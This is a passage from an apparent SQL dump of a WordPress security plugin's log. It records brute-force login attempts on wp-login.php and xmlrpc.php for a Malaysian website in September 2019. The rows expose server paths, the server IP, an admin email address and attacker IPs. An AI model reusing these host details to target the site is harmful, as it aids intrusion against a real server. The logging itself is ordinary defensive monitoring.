GENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"69.0.149.222\";s:11:\"REMOTE_PORT\";s:5:\"34354\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4AGssUk-ccdsIHJF2NhgAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567490074.7258\";s:12:\"REQUEST_TIME\";s:10:\"1567490074\";}}','notice','2019-09-03 05:54:36','2019-09-03 05:54:35',17682536,19174400,'https://bintara.com.my/wp-login.php',1,0,'69.0.149.222'),(23589,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"69.0.149.222\";s:11:\"REMOTE_PORT\";s:5:\"34758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4AHn2eHR76PFZxoUg-hwAAAQU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567490078.2479\";s:12:\"REQUEST_TIME\";s:10:\"1567490078\";}}','notice','2019-09-03 05:54:39','2019-09-03 05:54:38',18204128,19503864,'https://bintara.com.my/xmlrpc.php',1,0,'69.0.149.222'),(23590,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"51.75.50.24\";s:11:\"REMOTE_PORT\";s:5:\"54336\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4SEn2eHR76PFZxoUhOZQAAARQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567494674.349\";s:12:\"REQUEST_TIME\";s:10:\"1567494674\";}}','notice','2019-09-03 07:11:16','2019-09-03 07:11:14',17683928,19174400,'https://bintara.com.my/wp-login.php',1,0,'51.75.50.24'),(23591,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"51.75.50.24\";s:11:\"REMOTE_PORT\";s:5:\"54786\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4SFeOUIElQNETcMvm3igAAAAk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567494678.0447\";s:12:\"REQUEST_TIME\";s:10:\"1567494678\";}}','notice','2019-09-03 07:11:20','2019-09-03 07:11:18',18201696,19500712,'https://bintara.com.my/xmlrpc.php',1,0,'51.75.50.24'),(23592,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.92.254\";s:11:\"REMOTE_PORT\";s:5:\"40064\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4YhfOcOgd1QKUUCENLKwAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567496325.3397\";s:12:\"REQUEST_TIME\";s:10:\"1567496325\";}}','notice','2019-09-03 07:38:48','2019-09-03 07:38:46',17682880,19173272,'https://bintara.com.my/wp-login.php',1,0,'157.230.92.254'),(23593,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.92.254\";s:11:\"REMOTE_PORT\";s:5:\"40472\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4YifOcOgd1QKUUCENLLwAAAFU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567496330.0504\";s:12:\"REQUEST_TIME\";s:10:\"1567496330\";}}','notice','2019-09-03 07:38:52','2019-09-03 07:38:50',18201816,19499128,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.92.254'),(23594,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"109.168.26.51\";s:11:\"REMOTE_PORT\";s:5:\"42946\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4eRxTPYOiG2TtxVKrWpwAAAVM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567497799.8286\";s:12:\"REQUEST_TIME\";s:10:\"1567497799\";}}','notice','2019-09-03 08:03:21','2019-09-03 08:03:20',17685792,19177152,'https://bintara.com.my/wp-login.php',1,0,'109.168.26.51'),(23595,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"109.168.26.51\";s:11:\"REMOTE_PORT\";s:5:\"43318\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4eSxTPYOiG2TtxVKrWqQAAAU8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567497804.0491\";s:12:\"REQUEST_TIME\";s:10:\"1567497804\";}}','notice','2019-09-03 08:03:26','2019-09-03 08:03:24',18205816,19504800,'https://bintara.com.my/xmlrpc.php',1,0,'109.168.26.51'),(23596,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"104.248.40.97\";s:11:\"REMOTE_PORT\";s:5:\"22314\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4qfRTPYOiG2TtxVKriEwAAAVI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567500925.9759\";s:12:\"REQUEST_TIME\";s:10:\"1567500925\";}}','notice','2019-09-03 08:55:28','2019-09-03 08:55:26',17687856,19178904,'https://bintara.com.my/wp-login.php',1,0,'104.248.40.97'),(23597,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 